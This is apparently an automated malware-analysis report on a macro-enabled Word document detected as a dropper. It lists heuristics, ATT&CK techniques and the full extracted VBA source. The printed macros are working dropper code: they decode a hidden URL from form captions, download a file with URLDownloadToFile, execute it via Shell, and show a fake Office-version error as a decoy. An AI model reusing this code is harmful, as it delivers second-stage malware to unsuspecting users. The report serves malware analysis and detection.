MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is an OOXML document containing VBA macros that instruct the user to enable content, a common lure. The VBA code utilizes Shell() and URLDownloadToFile functions, indicating it downloads and executes a second-stage payload. ClamAV detection as 'Doc.Dropper.Agent-7402850-0' further supports its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-7402850-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7402850-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Function Go2(v0, v1, v3) Shell v1 End Function -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
#If VBA7 Then Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3676 bytes |
SHA-256: c18acae55ed374e1cd088762fd5569f1424e6d13d1a4e3e07c6670b711f6733b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub InkEdit1_Change()
Dim hR1 As String
hR1 = "Hello researcher =D v.9.5.34" & _
"Night / 1823" & _
"My voice, to which love lends a tenderness and yearning," & _
"Disturbs night's dreamy calm... Pale at my bedside burning," & _
"A taper wastes away... From out my heart there surge" & _
"Swift verses, streams of love, that hum and sing and merge" & _
"And, full of you, rush on, with passion overflowing." & _
"I seem to see your eyes that, in the darkness glowing," & _
"Meet mine... I see your smile... You speak to me alone:" & _
"My friend, my dearest friend... I love... I'm yours... your own."
End Sub
Private Sub InkEdit1_GotFocus()
St
End Sub
Attribute VB_Name = "QYE154"
Attribute VB_Base = "0{DE55A1CA-3A8D-49FF-A2A0-FDCDFDE9408B}{F4137A24-3413-4E86-A00B-6FF4D3CD3DD5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
End Sub
Private Sub TextBox2_Change()
End Sub
Private Sub Label1_Click()
End Sub
Private Sub Mnyer1_Click()
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "Module1"
#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
ByVal szURL As String, ByVal szFileName As String, _
ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
ByVal szURL As String, ByVal szFileName As String, _
ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Function wer2(v0, v1, v2, v4)
URLDownloadToFile 0, v1, v2, 0, 0
End Function
Sub St()
Dim url1 As String
url1 = gtF1
Dim path1 As String
path1 = gtF2
Dim obj1 As Object
If IsObject(obj1) = True Then
Dw2 3445, url1, path1
End If
Dim pth As String
pth = path1
Go1 "yrfgr", pth
End Sub
Sub Dw2(v1, url1, path1)
wer2 2, url1, path1, 7
End Sub
Function Dcr2(a1)
Dim b1 As String
Dim s1 As String
lb1 = LBound(a1)
ub1 = UBound(a1)
For o1 = lb1 To ub1
b1 = Chr(a1(o1))
s1 = s1 + b1
Next o1
Dcr2 = s1
End Function
Function Go2(v0, v1, v3)
Shell v1
End Function
Function Bbox(v2, v1)
MsgBox v1, 16
End Function
Function gtF1()
gtF1 = Dcr(QYE154.Nuetb1.Caption)
End Function
Function gtF2()
gtF2 = Dcr(QYE154.Nuetb2.Caption)
End Function
Attribute VB_Name = "Module2"
Function Dcr(str)
arr = Split(str, ",", -1)
Dcr = Dcr2(arr)
End Function
Function Go1(v0 As String, v1 As String)
Go2 "werwe", v1, "234234"
Bbox "hepoik", gtMs
End Function
Function gtMs()
gtMs = "This ap" & "plic" & "ation ap" & "pears to ha" & "ve be" & "en made wi" & "th an old" & "er versi" & "on of the Mi" & "cro" & "soft Off" & "ice product su" & "ite. Please have the author save this doc" & "ument to a newer and sup" & "ported format. [Er" & "ror Co" & "de: -21" & "9]"
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 23040 bytes |
SHA-256: b3dd70a15e73ec7426c275ca7e74cec53ddcabddef7be7545e57bb1c39858796 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.